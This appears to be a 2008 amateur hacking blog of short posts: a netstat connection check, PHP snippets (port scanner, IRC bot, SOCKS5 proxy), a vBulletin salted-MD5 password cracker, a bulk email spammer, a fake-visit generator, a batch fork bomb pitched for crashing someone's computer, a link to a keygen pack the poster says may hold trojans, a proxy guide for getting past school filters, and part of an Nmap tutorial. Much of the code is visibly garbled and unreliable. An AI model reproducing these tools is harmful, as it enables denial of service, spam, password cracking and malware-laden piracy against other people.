Monday, June 9, 2008

How to check if your computer is being hacked/infected

hi everyone this is a tutorial that i learned on how to see if your computer has been infected or hacked...

steps-make sure you have no program running..aim/yahoo/msn or web-pages nothing!

1. click start-run then type cmd

2. ok type in netstat -ano then enter

3. then a list of PID's IP's and states should come up saying either listening or established

4. alright you want to look at the established PID's (process identifier)

5. write down the PID numbers and close the command prompt

6. press ctrl alt and delete or exit the task manager should come up.

7. click on view-columns and check the box with the PID (process identifier) on it hit ok

8. go to the processes and look for the established PID number then highlight it and end process.

9. you can check to see if you cleared the connection by doing steps 1 and 2..

10. the established connections should be gone

hope this helps everyone out there......

using udp PHP

> $fp = fsockopen("udp://127.0.0.1", 13, $errno, $errstr);
if (!$fp) {
echo "ERROR: $errno - $errstr
\n";
} else {
fwrite($fp, "\n");
echo fread($fp, 26);
fclose($fp);
}
?>

php portscanner

$port1 = 10;
$port2 = 105;
$hostdata = "127.0.0.1";

for ($i = $port1;$i<=$port2; $i++) {
$scan = @fsockopen("$hostdata", $i, $errno, $errstr, 100000000000000000000000);
if($scan) {
echo "Port " . $i . " is OPEN on " . $hostdata;
echo "
";
} else {
echo "Port " . $i . " is CLOSED on " . $hostdata;
echo "
";
}
}
?>

extract emails "PHP"

> function extract_emails($str){
// This regular expression extracts all emails from
// a string:
$regexp = /([a-z0-9_\.\-])+\@(([a-z0-9\-])+\.)+([a-z0-9]{2,4})+/i
preg_match_all($regexp, $str, $m);

return isset($m[0]) ? $m[0] : array();
}

$test_string = This is a test string...

test1@example.org


Test different formats:
test2@example.org;
foobar



strange formats:
test5@example.org
test6[at]example.org
test7@example.net.org.com
test8@ example.org
test9@!foo!.org

foobar


print_r(extract_emails($test_string));

calculate page load "PHP"

> = time();

// put a long operation in here
sleep(2);


$diff = time() - $start;

print "This page needed $diff seconds to load :-)";

// if you want a more exact value, you could use the
// microtime function
<

an irc bot "PHP"

<
IRC Bot




Nick:

Password:

Realname:

Owner: Note: Please use the full host of owner (nick!user@host)

Server:

Port:





set_time_limit(0);
if ($_GET[nick]) { $usernick = $_GET[nick]; }
else { $usernick = PHPBot; }
if ($_GET[realname]) { $realname = $_GET[realname]; }
else { $realname = PHPBot; }
if ($_GET[server]) { $server = $_GET[server]; }
else { $server = "irc.waypasteleven.com"; }
if ($_GET[port]) { $port = $_GET[port]; }
else { $port = 6667; }
if ($_GET[pass]) { $pass = $_GET[pass]; }
else { $pass = password; }
if ($_GET[owner]) { $pass = $_GET[owner]; }
else { $owner = "Sockmonkey!SockMonkey@says.you.are.a-freak.com"; }
$socket = fsockopen($server, $port);
fputs($socket,"USER $usernick socky-bot.net Socky :" . $realname . "\n");
fputs($socket,"NICK " . $usernick . "\n");
while(1) {
while($data = fgets($socket, 128)) {
echo nl2br($data);
flush();
$ex = explode( , $data);
if ($ex[0] == "PING"){
fputs($socket, "PONG ".$ex[1]."\n");
}
$command = str_replace(array(chr(10), chr(13)), , $ex[3]);
preg_match(/^:(.*?)!(.*?)$/i, $ex[0], $matches);
$host = "!".$matches[2];
$nick = $matches[1];
if ($ex[0] == ":irc.waypasteleven.com") {
if ($ex[1] == "433") {
fputs($socket, "NICK ".$usernick."_\n");
}
}
if ($ex[1] == "NOTICE") {
if ($ex[0] == ":NickServ!services@waypasteleven.com") {
if ($ex[3] == ":This") {
fputs($socket, "PRIVMSG NickServ :identify $pass\n");
echo($server." PRIVMSG NickServ identify ".$pass."")
}
}
}
/* Work on this */
if ($command == ":!say") {
fputs($socket, "PRIVMSG $ex[2] :".$ex[4]."\n");
}
if ($command == ":!commands") {
fputs($socket, "PRIVMSG $nick :!JOIN - !PART - !SAY - !CYCLE - !STOP\n");
}
if ($command == ":!join") {
fputs($socket, "JOIN ".$ex[4]."\n");
}
if ($command == ":!cycle") {
if ($ex[0] == ":".$owner) {
fputs($socket, "PART ".$ex[4]."\n");
fputs($socket, "JOIN ".$ex[4]."\n");
}
}
if ($command == ":!part") {
if ($ex[0] == ":".$owner) {
fputs($socket, "PART ".$ex[4]."\n");
}
}

//* THIS BIT *//
if ($ex[3] == ":".chr(1)."VERSION".chr(1)) {
fputs($socket, "notice $ex[2] :".chr(1)."Version PHP".chr(1)."\n");
}
if ($command == ":!stop"){
if ($ex[0] == ":".$owner) {
fputs($socket,"PRIVMSG $ex[2] Bot stopped!\n");
fputs($socket,"QUIT :Bot stopped by ".$nick."\n");
die("
$nick ended the bot.");
}
else {
fputs($socket,"KICK $ex[2] " . $nick . " Fuck you!\n");
}
}
}
sleep(0.1);
}
?>

checking for unsafe functions "PHP"

$badFunctions = array( "a...", "dom_import_simplexml", "domattr", "domattribute_name", "domattribute_set_value", "domattribute_specified", "domattribute_value", "domcharacterdata", "domcomment", "domdocument", "domdocument_add_root", "domdocument_create_attribute", "domdocument_create_cdata_section", "domdocument_create_comment", "domdocument_create_element", "domdocument_create_element_ns", "domdocument_create_entity_reference", "domdocument_create_processing_instruction", "domdocument_create_text_node", "domdocument_doctype", "domdocument_document_element", "domdocument_dump_file", "domdocument_dump_mem", "domdocument_get_element_by_id", "domdocument_get_elements_by_tagname", "domdocument_html_dump_mem", "mysql_get_client_info", "mysql_get_host_info", "mysql_get_proto_info", "mysql_get_server_info", "mysql_info", "mysql_insert_id", "mysql_list_dbs", "mysql_list_fields", "mysql_list_processes", "mysql_list_tables", "mysql_num_fields", "mysql_num_rows", "mysql_pconnect", "mysql_ping", "mysql_query", "mysql_real_escape_string", "mysql_result", "mysql_select_db", "mysql_set_charset", "mysql_stat", "mysql_tablename", "mysql_thread_id", "mysql_unbuffered_query", "mysqli", "mysqli_bind_param", "mysqli_bind_result", "mysqli_client_encoding", "mysqli_disable_reads_from_master", "mysqli_disable_rpl_parse", "mysqli_driver", "mysqli_enable_reads_from_master", "mysqli_enable_rpl_parse", "mysqli_escape_string", "mysqli_execute", "mysqli_fetch", "mysqli_get_metadata", "mysqli_master_query", "mysqli_param_count", "mysqli_report", "mysqli_result", "mysqli_rpl_parse_enabled", "mysqli_rpl_probe", "mysqli_rpl_query_type", "mysqli_send_long_data", "mysqli_send_query", "mysqli_set_opt", "z...");
foreach ($badFunctions as $disable) {
if (function_exists("$disable"))
die("Unsafe function $disable found. Aborting!\n");
}
?>

socks5 server "PHP"


/**
* Php Socks5 Server by KingOfSka @ http://contropotere.netsons.org
*
*
*/

array($dest);
error_reporting(E_ALL);
set_time_limit(0);
ob_implicit_flush();

$address = 燇.0.0.1
$port = 5554;

if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
echo "socket_create() fallito: motivo: " . socket_strerror($sock) . "\n";
}
if (($ret = socket_bind($sock, $address, $port)) < 0) {
echo "socket_bind() fallito: motivo: " . socket_strerror($ret) . "\n";
}
if (($ret = socket_listen($sock, 5)) < 0) {
echo "socket_listen() fallito: motivo: " . socket_strerror($ret) . "\n";
}
do {
if (($msgsock = socket_accept($sock)) < 0) {
echo "socket_accept() fallito: motivo: " . socket_strerror ($msgsock) . "\n";
break;
}

/** Initial Socks5 HandShake **/
$buf = socket_read($msgsock, 128, PHP_BINARY_READ);
if((implode(,unpack(C3cmd,$buf))) == 510){
$ans = pack(C2,0x05,0x00);
socket_write($msgsock, $ans, strlen($ans));
}

$buf = socket_read($msgsock, 4, PHP_BINARY_READ);
$buf = unpack(C4cmd,$buf);
$at = $buf[cmd4];
switch($at){

case 3 : /** Client gave us Domain Name **/
$buf = socket_read($msgsock, 1, PHP_BINARY_READ);
$buf = unpack(C1len,$buf);
$dest[host] = socket_read($msgsock, $buf[len], PHP_BINARY_READ);
break;

case 1: /** Client gave us IP **/
$buf = socket_read($msgsock, 4, PHP_BINARY_READ);
$hip = $buf;
$buf = unpack(C*,$buf);
$dest[host] = implode(.,$buf);
break;
}
$buf = socket_read($msgsock, 2, PHP_BINARY_READ);
$buf = unpack(nport,$buf);
$dest[port] = $buf[port];

/** Set Up Socket for Remote Host **/
$dsocket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$conn = socket_connect($dsocket, $dest[host], $dest[port]);

switch($at){

case 3: /** Domain Name Address Reply **/
$buf = pack(C5,0x05,0x00,0x00,0x03,strlen($dest[host])).$dest[host].pack("n", $dest[port]);
socket_write($msgsock, $buf, strlen($buf));
break;

case 1: /** Ip Address reply **/
$buf = pack(C4,0x05,0x00,0x00,0x01).$hip.pack("n", $dest[port]);
socket_write($msgsock, $buf, strlen($buf));
break;
}

/** Start data transfer loop **/
do {
if (FALSE === ($req = socket_read($msgsock, 2048, PHP_BINARY_READ))) {
echo "socket_read() fallito: motivo: " . socket_strerror($ret) . "\n";
break 2;
}

$ans =  ;

echo $req;
socket_write($dsocket,$req,strlen($req));
$ans = socket_read($dsocket,2048,PHP_BINARY_READ);
echo $ans;
socket_write($msgsock,$ans,strlen($ans));


echo "----r/w completed----\n";
}while (true);
socket_close($msgsock);
socket_close($dsocket);
} while(true);


?>

char detection "PHP"



// sunjester
// 2008
// www.mrsunjester.info
function clean($string) {
$badChars = array("","\"","<",">",".",",","!","@",
"#","$","%","^","&","*","(",")","_",
"-","=","+");

$length = strlen($string);

for($i=0;$i<=$length;$i++) {
$curChar = substr($string,$i,1);

for($j=0;$j<=$length;$j++) {
if($badChars[$j] == $curChar) {
die("string is bad! (error at char: $j)");
}
}
}

return $string;
}

// example usage
//echo clean("!sunjester");
//echo clean("sunjester");
?>



vbulletin hash cracker "PHP"


//
// author sunjester
// site http://mrsunjester.info/
// irc irc://irc.securitychat.org/hostile (#hostile)
// contact tripmonster@gmail.com || mr.lerie@gmail.com
//
// how to use
// 1. (textbox1) input the password you think it is
// 2. (textbox2) input the salt of that password
// 3. (textbox3) input the salt of the password you want to break
// 4. (button) push button.
// 5. click my ads. http://mrsunjester.info/

echo "

>br /<";

function clean($string) {
$string = htmlentities($string);
return $string;
}

$check = $_GET[check];

if(!$check) {
echo "


















what password do you think it is?
whats the salt?
whats the hash?
 

";

die("
");
}

$cleanpw = clean($_POST[password]);
$salt = $_POST[salt];

$hash = MD5(MD5($_POST[password]).$salt);

if($hash == $_POST[hash]) {
echo "$cleanpw is the password";
} else {
echo "$cleanpw is NOT the password";
}

// seriosuly, how easy was that? should i go ahead and
// add more features to it? shit, i could make one in
// a couple different languages, gui, etc. but what
// do i get? lol lazy bastards, do it yourself!
?>













Duel Booting Tutorial



For those who don't know, dual-booting is the act of having two operating systems installed simultaneously on your computer. To do this, you will need some tools:

1. any distro linux Live CD or any other OS Live CD you want (i will be talking about Ubuntu as example some other OS may vary in intsallation : all these links below will allow you to download the popular linux distros them (props to Chi_Kitory for giving me the links to the last three)

http://www.ubuntu.com/


http://www.kubuntu.org/



http://www.edubuntu.org/



http://www.xubuntu.org/

2. half a Brain

3. Recommended 10g free space required like 4g

4. Desire to run and learn linux!

Once you've downloaded the Linux iso, check the md5 if desired, then burn the iso to a disk. The iso is a file that tells the cd burner exactly what goes on the disk. Once that is done, you should defragment your hard drive. Some times when a drive is fragmented, you cant partition it because there are fragments in the area you are separating. This may take some time. Walk around, read a book, or just watch while this is in progress.

If Linux booted, congratulations, were 1/3 of the way there. If not, refer to your BIOS manual and see how to boot from cd. After linux boots, depending on the distro.. i am gonna use Ununtu there should be a menu with like 4 options. Click the second option that should say install (in this case) Ubuntu. if you just want to try it out first you can by choosing the first option it should say "try ubuntu without changing settings on your computer". by choosing the first option it will allow you to use linux untill you restart.



Ok now that you have selected install linux.. its is gonna start setting it up.. then it will ask you about partitioning your HDD(hard disk drive)..now i am going to throw out a serious caution.. if you only have one HDD then you need to be careful when you partition it becasue it reformats the section of the HDD and you could end up overwriting files you dont want to lose. i highly suggest if you have two HDD use the second one... and make sure it is empty. once you decide the Partition then it is pretty simple from there..



Now it should take a while to reformat the HDD and install ubuntu... after that is all done you will be required to restart the computer. before the computer boots up it will go into this GRUB program and it will allow you to choose your OS you wish to boot (i am not sure about the other OS.. once i try the others i will update this Tutorial).



there you go you now have your computer duel booting!



Note: Duel boot can get annoying if you constantly have to switch back and forth.. any files that you have on the other OS you will have to use a USB to tranfer back and forth... so you could do this if you decide duelbooting isnt for you...



Use a virtual Machine... they are.. programs that emulate an Operating system.. they are pretty nice.. i recommend Sun microsystems VirtualBox



heres the link https://cds.sun.com/is-bin/INTERSHOP...-F@CDS-CDS_SMI



Hope you enjoy the Tutorial ^_^



Tell me how it works for you!
__________________
"Alcohol and calculus don’t mix. Never drink and derive."

"Artificial Intelligence usually beats natural stupidity."

---



email spammer "php"



> session_start();
echo "restart - Send Next One
";
if(isset($logout)) {
session_destroy();
echo "";
} else {
if ($_SESSION[count] == "") {
$_SESSION[count] = 1;
} else {
$_SESSION[count] = $_SESSION[count] + 1;
}
}

function ReadLine($path) {
$linenum = $_SESSION[count];
//$path = "emails2.txt";
$handle = fopen($path, "r");
$lines=file($path);
echo $lines[$linenum];
}
mail(ReadLine("emails2.txt"), Hostile Graphics - News, http://hgsdomination.com/, null,
no-reply@hgsdomination.com);
?>

Some SQL Commands

Here is a list of SQL commands and what they do, these would be used in some injection methods and of course legitimate sql functions. On thier own they wont exploit anything but eventually you'll find an exploit that needs these and they are good to know for injection or just to better understand how SQL works.ABORT -- abort the current transactionALTER DATABASE -- change a databaseALTER GROUP -- add users to a group or remove users from a groupALTER TABLE -- change the definition of a tableALTER TRIGGER -- change the definition of a triggerALTER USER -- change a database user accountANALYZE -- collect statistics about a databaseBEGIN -- start a transaction blockCHECKPOINT -- force a transaction log checkpointCLOSE -- close a cursorCLUSTER -- cluster a table according to an indexCOMMENT -- define or change the comment of an objectCOMMIT -- commit the current transactionCOPY -- copy data between files and tablesCREATE AGGREGATE -- define a new aggregate functionCREATE CAST -- define a user-defined castCREATE CONSTRAINT TRIGGER -- define a new constraint triggerCREATE CONVERSION -- define a user-defined conversionCREATE DATABASE -- create a new databaseCREATE DOMAIN -- define a new domainCREATE FUNCTION -- define a new functionCREATE GROUP -- define a new user groupCREATE INDEX -- define a new indexCREATE LANGUAGE -- define a new procedural languageCREATE OPERATOR -- define a new operatorCREATE OPERATOR CLASS -- define a new operator class for indexesCREATE RULE -- define a new rewrite ruleCREATE SCHEMA -- define a new schemaCREATE SEQUENCE -- define a new sequence generatorCREATE TABLE -- define a new tableCREATE TABLE AS -- create a new table from the results of a queryCREATE TRIGGER -- define a new triggerCREATE TYPE -- define a new data typeCREATE USER -- define a new database user accountCREATE VIEW -- define a new viewDEALLOCATE -- remove a prepared queryDECLARE -- define a cursorDELETE -- delete rows of a tableDROP AGGREGATE -- remove a user-defined aggregate functionDROP CAST -- remove a user-defined castDROP CONVERSION -- remove a user-defined conversionDROP DATABASE -- remove a databaseDROP DOMAIN -- remove a user-defined domainDROP FUNCTION -- remove a user-defined functionDROP GROUP -- remove a user groupDROP INDEX -- remove an indexDROP LANGUAGE -- remove a user-defined procedural languageDROP OPERATOR -- remove a user-defined operatorDROP OPERATOR CLASS -- remove a user-defined operator classDROP RULE -- remove a rewrite ruleDROP SCHEMA -- remove a schemaDROP SEQUENCE -- remove a sequenceDROP TABLE -- remove a tableDROP TRIGGER -- remove a triggerDROP TYPE -- remove a user-defined data typeDROP USER -- remove a database user accountDROP VIEW -- remove a viewEND -- commit the current transactionEXECUTE -- execute a prepared queryEXPLAIN -- show the execution plan of a statementFETCH -- retrieve rows from a table using a cursorGRANT -- define access privilegesINSERT -- create new rows in a tableLISTEN -- listen for a notificationLOAD -- load or reload a shared library fileLOCK -- explicitly lock a tableMOVE -- position a cursor on a specified row of a tableNOTIFY -- generate a notificationPREPARE -- create a prepared queryREINDEX -- rebuild corrupted indexesRESET -- restore the value of a run-time parameter to a default valueREVOKE -- remove access privilegesROLLBACK -- abort the current transactionSELECT -- retrieve rows from a table or viewSELECT INTO -- create a new table from the results of a querySET -- change a run-time parameterSET CONSTRAINTS -- set the constraint mode of the current transactionSET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current sessionSET TRANSACTION -- set the characteristics of the current transactionSHOW -- show the value of a run-time parameterSTART TRANSACTION -- start a transaction blockTRUNCATE -- empty a tableUNLISTEN -- stop listening for a notificationUPDATE -- update rows of a tableVACUUM -- garbage-collect and optionally analyze a database

generate fake website users

PHP


use LWP::Simple; print "Website Visitor Faker\n"; print "coded in perl by Athleone\n\n"; print "Type the website you want to fake visits to.\n"; print ">"; $site=; print "Checking whether site is valid..."; chomp($site); $check=get($site); if($check ne "") { print "Site $site valid.\n\n"; } else { die "Site $site not valid.\n\n"; } print "Type the number of visits you want added.\n"; print ">"; $visitz=; chomp($visitz); for($i=1;$i<=$visitz;$i++) { get($site); print "Visited site $i time(s)....\n"; } print "Done.";

Friday, June 6, 2008

Login form


Hey so this is my first tutorial, this isn't a step by step tutorial as you can see i have just wrote a login script and explained what i was doing as i go along if it is a success i will write a register tutorial as well. Thanks KiNgY
PHP:
The session_start(); function is important and needs to go at the start of each page you want logged in members to access.The include() function just includes my db_connect script which allows me access to my database.
PHP:
This i feel is rather self explanatory, the value of $id depends on which fields of data are missing, i will use $id further down the script to display certain error messages.If the required data is entered it will be queried against my database and if there is a row with username $user and password $pass the login is a success and the session username is set and the user is forwarded onto a different page in this case logged_in.php.HTML for the login formthere is also some php in here for displaying error messages


PHP:
'' && $id<='3'){ echo ""; }if($id=='5'){ echo ""; }?>
User Login
Please fill in missing fields (*)
Sorry but your login details where incorrect

PHP:
* "; }?>Username:

PHP:
* "; }?>Password:
LinksIf you would like to see the completed code please visit here:Full source codeThanks again KiNgY

Thursday, June 5, 2008

large universal keygen

this has no creds to me i just found it on the internet and it looks legit. supposedly there are trojans but some of the files dont have and the trojans are actually the keygens themselves. so use at your own risk.

http://depositfiles.com/files/3403897features
: ACDSee 8.0 Photo Manager Keygen - ACDSee 9.0 Photo Manager Keygen Rus - ACDSee 10 Photo Manager Serial - Adobe Acrobat 8.0 Keygen - Adobe Contribute CS3 Keygen - Adobe CS3 Design Premium Keygen - Adobe CS3 Master Collection Keygen - Adobe CS3 Web Premium Keygen - Adobe Dreamweaver CS3 Keygen - Adobe Encore CS3 Keygen - Adobe Fireworks CS3 Keygen - Adobe Flash CS3 Keygen - Adobe InDesign CS3 Keygen - Adobe PageMaker 7.0 Serial - Adobe Photoshop CS2 9.0 Keygen - Adobe Photoshop CS3 Keygen - Adobe Photoshop CS Serial - Adobe Photoshop Extended CS3 Keygen - Adobe Premier Pro 7.0 - Adobe Premier Pro CS3 Keygen - AnyDVD HD v6.1.3.3 Key - AnyDVD HD v6.1.7.0 Key - AnyDVD HD v6.1.75 Patch - AutoCAD 2008 Keygen - AVAST32 - Avi mpg splitter 2.31 - Corel Draw X3 Keygen - DVD Region CSS Free v5.16 Crack - DVD-Lab Pro 2.3 Crack - Error Doctor 2008 - HyperCam v2.10.02 Crack - ImTOO DVD Ripper 2.0 Serial - Kingdia DVD Ripper Keygen - Macromedia Dreamweaver MX Serial - Macromedia Flash MX Serial Rus - Macromedia HomeSite Serial - Microsoft Office 2003 Serial - Microsoft Office 2007 Keygen - Nero 7 Ultra Edition Keygen - Nero 8 Ultra Edition 8.1.1.0 Keygen - Partition Magic v8.0.1242 Serial - PerfectDisk.8 - PC Video Converter Studio 4.6 Serial - PowerCHM 5.5 Crack - PowerDVD 6 Keygen - Reg Organizer 4.10 Keygen Rus - RegClean 2007 Edition v2.6 Patch - Sitecraft v1.1 Serial - Sokrat Personal v4.1 - Sound Forge 7 Keygen Rus - Sound Forge 8 Keygen Rus - Sound Forge 9a Patch - StripSaver 2.13 Keygen - System Mechanic Professional v5.0 Serial - TuneUp_Utilities 2008 - Throttle 2008 - Ulead GIF Animator v5.05 Crack - Virtual Drive 9.03 Serial Rus - Virtual Drive 10 Serial - WinDVD 7 - WinDVD Platinum 8.0.06.110 Keygen - Xilisoft 3GP Video Converter 2.1.55.1008 Keygen - СозКомек 3.0 Serial

Crash Someone's Computer In Less Than A Minute! "Only For Education Purpose"

O.K Just like Last Time This Virus Uses CMD.EXE(Something.bat) -First open up Notepad -Then type in this code

@echo off B: start CMD.exe Goto B

-then save it as Havetosee.bat this code will open up CMD an Infinite Amount of times Causing the Computer to Crash *I give Credit to H4XZOR For Correcting The Code* *I am Not Responsible for any harm done to your computer or to any one else's computer


Another example:


yea well still this is the best code to crash a pc ^^
@echo off start %0 pause

Proxy Tutorial

HIDE YOUR SELF!! OS:Windows XP Alright here is my tutorial on hiding you ass on the net. When I say hide your ass I mean hiding your with multiple proxy programs and proxy sites. First off when your at school you know how you want to see a site its blocked so you use a proxy site like... www.proxify.com which is blocked at most schools now so you would have to use a different one like www.freeproxy.com/ which shouldn't be block if it is you may use any others of your choice. You just enter the url into the boxes and BAM your onto the sites you want. Some of you may use proxies like 127.0.0.1:8080 Yeah i know the ip is localhost but i dont know any off hand right now. You can find many proxy lists out there to use. I will attach my proxy list I use for some of the programs I mention at the bottom. First off this isn't using programs like proxy firewall the programs i use here are all extensions for mozilla firefox so they will probably work for the linux OS. Now lets get started install mozilla firefox if you haven't already. The programs you can use proxies with are.....
proxysel foxtor foxyproxy httProxy PhProxy Proxy toolbar SwitchProxyTool TorbuttonNow these are just the proxy programs the programs i use to hide my data from the computer itself is...
Distrust Stealther Tamper Data TrackMeNot

NMAP Tutorial

OS: Windows Alright NMAP is a popular scanner used for figuring out information about servers like what operating system they may be running on what ports are open. It offers a loggin system that allows a user to log all the results for their scanning session so they can pass it on to others For this tutorial I am going to just scan a single website and explain a common 'error' message some users may recieve. The website for this Tutorial i will be using is... www.meow.com some random site Now lets get started first off get nmap from our downloads section Got it okay scanned it okay fucked it okay now place these files in your system32 folder or a folder you store your CLI(command line interface) programs in. Open CMDand type nmap and you will get the following syntax and options... lun0s@~E:\cmds>nmap Nmap 4.20 ( http://insecure.org ) Usage: nmap [Scan Type(s)] [Options] {target specification} TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 -iL : Input from list of hosts/networks -iR : Choose random targets --exclude : Exclude hosts/networks --excludefile : Exclude list from file HOST DISCOVERY: -sL: List Scan - simply list targets to scan -sP: Ping Scan - go no further than determining if host is online -P0: Treat all hosts as online -- skip host discovery -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes -n/-R: Never do DNS resolution/Always resolve [default: sometimes] --dns-servers : Specify custom DNS servers --system-dns: Use OS's DNS resolver SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags : Customize TCP scan flags -sI : Idlescan -sO: IP protocol scan -b : FTP bounce scan PORT SPECIFICATION AND SCAN ORDER: -p : Only scan specified ports Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080 -F: Fast - Scan only the ports listed in the nmap-services file) -r: Scan ports consecutively - don't randomize SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info --version-intensity : Set from 0 (light) to 9 (try all probes) --version-light: Limit to most likely probes (intensity 2) --version-all: Try every single probe (intensity 9) --version-trace: Show detailed version scan activity (for debugging) OS DETECTION: -O: Enable OS detection (try 2nd generation w/fallback to 1st) -O2: Only use the new OS detection system (no fallback) -O1: Only use the old (1st generation) OS detection system --osscan-limit: Limit OS detection to promising targets --osscan-guess: Guess OS more aggressively TIMING AND PERFORMANCE: Options which take